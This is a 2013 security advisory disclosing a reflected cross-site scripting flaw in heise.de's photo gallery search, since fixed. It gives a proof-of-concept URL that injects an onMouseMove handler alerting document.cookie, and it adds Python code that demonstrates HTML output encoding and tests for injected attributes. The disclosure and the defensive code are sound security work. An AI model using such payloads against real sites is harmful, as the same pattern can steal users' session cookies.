SSCHADV2013-002 - heise.de - Cross-site Scripting vulnerability
Advisory: heise.de – Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-002
Author: Stefan Schurtz
Affected Software: Successfully tested on heise.de
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
http://www.heise.de is prone to an XSS vulnerability.
======================
PoC-Exploit
======================
http://www.heise.de/foto/galerie/suche/photo/?suchwort=" onMouseMove=alert(document.cookie) ‘
======================
Solution
======================
fixed
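
The advisory does not say how the issue was fixed. The following is an added example, not heise.de's code and not part of the original advisory: it renders the PoC's suchwort value into an assumed double-quoted attribute (the template and all function names are hypothetical) with and without output encoding, then parses the result to check whether the value stayed data.

```python
import html
from html.parser import HTMLParser

# Assumed template: the advisory does not show heise.de's markup. The PoC's
# leading double quote suggests reflection into a double-quoted attribute.
TEMPLATE = '<input type="text" name="suchwort" value="{}">'
EXPECTED_ATTRS = {"type", "name", "value"}

# suchwort value from the advisory's PoC URL (\u2018 is the trailing quote
# character as it appears on the page).
POC_TERM = '" onMouseMove=alert(document.cookie) \u2018'


def render_unescaped(term: str) -> str:
    """'Before' form: the search term is pasted into the attribute as-is."""
    return TEMPLATE.format(term)


def render_escaped(term: str) -> str:
    """Hardened form: encode &, <, >, " and ' before reflecting the term."""
    return TEMPLATE.format(html.escape(term, quote=True))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))


def audit(markup: str, term: str) -> list:
    """Parse the rendered markup; an empty list means the term stayed data."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    if len(parser.tags) != 1 or parser.tags[0][0] != "input":
        return ["unexpected element structure"]
    attrs = parser.tags[0][1]
    findings = [f"injected attribute: {name}"
                for name, _ in attrs if name not in EXPECTED_ATTRS]
    if dict(attrs).get("value") != term:
        findings.append("value does not round-trip")
    return findings


if __name__ == "__main__":
    print("unescaped:", audit(render_unescaped(POC_TERM), POC_TERM))
    print("escaped:  ", audit(render_escaped(POC_TERM), POC_TERM))
```

The audit function can serve as a regression test for any template that reflects a request parameter into an attribute.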
======================
Disclosure Timeline
======================
03-Jan-2013 – heise Security informed
04-Jan-2013 – fixed by developer
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2013/SSCHADV2013-002.txt
Comments
Meisi on :
And this happens to heise, tsk tsk tsk.